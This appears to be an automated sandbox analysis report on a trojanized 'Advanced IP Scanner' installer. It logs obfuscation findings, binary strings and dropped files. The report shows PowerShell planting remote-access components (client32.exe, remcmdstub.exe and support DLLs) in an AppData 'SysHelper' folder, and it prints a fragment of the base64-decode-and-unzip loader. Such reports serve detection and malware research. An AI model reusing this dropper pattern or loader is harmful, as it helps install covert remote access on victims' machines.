Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2132549771.0000000002D9D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: is-3ARML.tmp.1.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: is-NMSBJ.tmp.1.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: is-51B0J.tmp.1.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: is-JV2VP.tmp.1.dr
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.3640885931.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.2161541920.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2250457017.0000000068895000.00000002.00000001.01000000.0000000D.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($base64Content);[System.IO.File]::WriteAllBytes($zipFileName, $decodedBytes);New-Item -ItemType Directory -Path $destinationPath;Expand-Archive -Path $zipFileName -DestinationPath $de

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,

7_2_11029230

PE file contains sections with non-standard names

Source: Advanced_IP_Scanner_2.5.4594.12.exe	Static PE information: section name: .didata
Source: Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	Static PE information: section name: .didata
Source: is-J88P9.tmp.1.dr	Static PE information: section name: .didata
Source: is-LK5P7.tmp.1.dr	Static PE information: section name: .didat
Source: is-4DCVH.tmp.1.dr	Static PE information: section name: .00cfg
Source: is-R93D4.tmp.1.dr	Static PE information: section name: .qtmetad
Source: is-RSL5S.tmp.1.dr	Static PE information: section name: .qtmetad
Source: PCICL32.DLL.5.dr	Static PE information: section name: .hhshare

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_030BE262 push esi; retf	5_2_030BE263
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_030BF1D0 pushad ; retf	5_2_030BF1D1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_076787A8 push 0000005Dh; ret	5_2_076787CE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07671FB2 push eax; ret	5_2_07671FB3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07678D62 pushad ; ret	5_2_07678D63
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07676B72 push eax; ret	5_2_07676B73
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0767C86A push esp; iretd	5_2_0767C8B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0767C801 push esp; retf	5_2_0767C831
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0767C8D0 push esp; iretd	5_2_0767C8B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07809CE5 push FFFFFFE8h; ret	5_2_07809CE9
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1116B825 push ecx; ret	7_2_1116B838
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11166719 push ecx; ret	7_2_1116672C
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11040641 push 3BFFFFFEh; ret	7_2_11040646
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C6BBF push ecx; ret	7_2_685C6BD2
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685C4DF5 push 685C43F9h; retf	7_2_685C4E1F
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1116B825 push ecx; ret	8_2_1116B838
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11166719 push ecx; ret	8_2_1116672C
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11040641 push 3BFFFFFEh; ret	8_2_11040646

Source: msvcr100.dll.5.dr

Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-8ANUI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-4D790.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-JMQQ6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-NMSBJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\ucrtbase.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-G1QBE.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-E5GMR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-50T4N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-IMIK4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-SNR73.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\platforms\is-R93D4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-LK5P7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-JD615.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-OFA57.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-G1AVJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-HU2BS.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-MLS3P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-GSEGB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-8NFDN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-51B0J.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-IG6SE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-BI69I.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-HE8PV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-JV2VP.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-MRJ39.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-6GDPR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-GO656.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-94LO6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-FDUCH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-CFBB0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-S9HF4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-KVJOO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-8I66A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-B6942.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-7T7KO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	File created: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-GUGRV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-2CC7N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-RSL5S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-9QSUE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-4PSUK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-3DFK3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-PV5DC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-NDG98.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-37BEP.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-OL4PO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-UUUMK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-7UOKJ.tmp	Jump to dropped file
